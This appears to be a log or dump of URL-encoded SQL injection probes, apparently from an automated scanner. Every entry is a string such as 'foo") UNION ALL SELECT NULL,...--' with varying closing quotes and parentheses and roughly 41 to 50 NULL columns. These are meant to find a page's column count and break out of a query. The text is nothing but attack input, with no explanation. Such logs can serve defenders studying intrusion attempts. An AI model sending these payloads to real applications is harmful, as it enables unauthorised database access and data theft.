foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 